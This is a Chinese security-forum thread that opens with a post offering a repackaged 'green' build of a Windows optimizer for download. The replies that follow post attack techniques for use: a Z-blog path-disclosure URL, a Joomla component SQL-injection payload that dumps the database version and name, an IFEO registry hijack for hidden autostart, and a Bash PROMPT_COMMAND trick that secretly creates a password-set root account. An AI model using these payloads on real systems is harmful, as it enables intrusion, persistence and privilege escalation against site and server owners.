最近看过此主题的会员

返回列表 发帖

[系统相关] Windows 优化大师 Pro v7.99 木蚂蚁社区绿色专版

Windows 优化大师 Pro v7.99 木蚂蚁社区绿色专版
软件分类:
系统工具
运行环境:Win9X/Win2000/WinXP/Win2003/Vista/win7
软件语言:简体中文
授权方式:免费版
软件大小:0KB
更新时间:2011-8-2
软件简介:
从系统信息检测到调校、从系统清理到维护,Windows优化大师都为您提供比较全面的解决方案。Windows优化大师同时适用于Windows98/Me/XP/2000/2003/Vista 操作系统,提供了全面有效、简便安全
的:系统检测;系统清理;系统维护;系统优化等功能,让您的电脑始终保持在最佳状态。
Windows优化大师 V7.99  更新说明:
1、硬件检测模块,增加对ATI 5800系列的显卡温度的读取
2、注册表扫描模块,增强对Windows 7操作系统的兼容性
3、历史痕迹清理模块,增强对Windows 7操作系统的兼容性
4、开机速度优化模块,调整部分品牌机自启动程序的识别
5、桌面菜单优化模块中的细小调整
windows 优化大师 Pro v7.99  木蚂蚁社区专版:
1、本版本完全去广告;
2、本版本仅仅保留了优化大师的核心部分,其他辅助模块程序全部去除。
3、运行本版本前,请先运行“Windows 优化大师专业版 绿化工具 v2.0 ( 静默安装方式)”;
4、本版本为绿色版。

点此下载:http://www.xp600.com/soft/html/476.html
本地下载

 

您可能还想看的主题:

Ghost安装器(ISO还原/备份系统/安装系统/进入DOS) 绿色版v1.3.9.2

安全宝招聘安全服务工程师

CCleaner 汉化单文件独木成林绿化版32位&64位V3.09.1493

安卓优化大师v2.0.7 for Android版

nero10中文免费版下载,Nero刻录软件V10.0.11100序列号注册版

腾讯招聘业务安全工程师

windows SDK 系列课程全套

浙江政安信息安全研究中心招贤纳士啦!

简单web服务器文件管理5.3缓冲区溢出

记一次曲折的渗透和另类的提权

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:laizhebushan_发表,本帖发表者laizhebushan_符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者laizhebushan_和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

Z-blog 1.8 爆web路径信息漏洞
影响版本:
Z-blog 1.8
漏洞描述:
Z-blog使用的默认编辑器存在路径信息泄露漏洞
测试方法:
/admin/FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
厂商补丁:
Z-blog目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.rainbowsoft.org


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Joomla! Component StreetGuessr Game v1.1.8 SQL注入漏洞
# # # # #
# Exploit Title: Joomla! Component StreetGuessr Game v1.1.8 - SQL Injection
# Dork: N/A
# Date: 03.08.2017
# Vendor : https://www.nordmograph.com/
# Software: https://extensions.joomla.org/extensions/extension/sports-a-games/streetguessr-game/
# Demo: https://www.streetguessr.com/en/component/streetguess/
# Version: 1.1.8
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_streetguess&view=maps&catid=[SQL]
# 0'+/*!11110procedure*/+/*!11110analyse*/+(/*!11110extractvalue*/(0x30,/*!11110concat*/(0x27,/*!11110@@version*/,0x7e,/*!11110database()*/)),0x30)--+-

# Etc..
# # # # #


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

[转载]映像劫持技术的应用
来源:lenk技术联盟
www.slenk.net  
作者:icemornings

映像劫持技术的应用
通常我们*的自启动大多是通过注册表启动项,文件夹启动项,服务启动等,然而还有一种人们所不常见的自启动方法,他不同于文件关联启动,他却能劫持某一特定程序,一下解释来自百度百科:“映像劫持”,也被称为“IFEO”(Image File Execution Options,其实应该称为“Image Hijack”,至少也应该称为IFEO Hijack而不是只有“IFEO”自身!),它的存在自然有它的理由,在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定,系统厂商之所以会这么做,是有一定历史原因的,在Windows NT时代,系统使用一种早期的堆栈Heap,由应用程序管理的内存区域)管理机制,使得一些程序的运行机制与现在的不同,而后随着系统更新换代,厂商修改了系统的堆栈管理机制,通过引入动态内存分配方案,让程序对内存的占用更为减少,在安全上也保护程序不容易被溢出,但是这些改动却导致了一些程序从此再也无法运作,为了兼顾这些出问题的程序,微软以“从长计议”的态度专门设计了“IFEO”技术,它的原意根本不是“劫持”,而是“映像文件执行参数”!映像劫持技术是通过修改注册表实现的:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options利用方法如下,我通过一个REG文件实现,如果使用编程也是非常简单的,REG文件内容如下:Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsxxx.exe]"Debugger"="abc.exe"这段代码表示要劫持的程序为xxx.exe,只要运行文件名为XXX.EXE的,不管在哪个文件夹下都会启动SYSTEM32目录下的abc.exe(当然你可以直接把ABC.EXE改成你要启动程序的路径。实现结果如图:

jiechi.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

利用BASH提权
要利用成功的话,还得看管理员的习惯,这个技巧要比

看个BASH的环境变量

$PROMPT_COMMAND

这个变量保存了在主提示符$PS1显示之前需要执行的命令.

export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"
随后你用su变成root,看看是否多了个用户呢
var im_d0a7aa84be1ce2b17729b900953bb02b = "";


也可以建立用户删除不了的文件比如,用户想删除某个,你在prompt_command里面加入cp命令,每次他执行完del都会又cp一个过去

具体怎么应用看你自己了


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表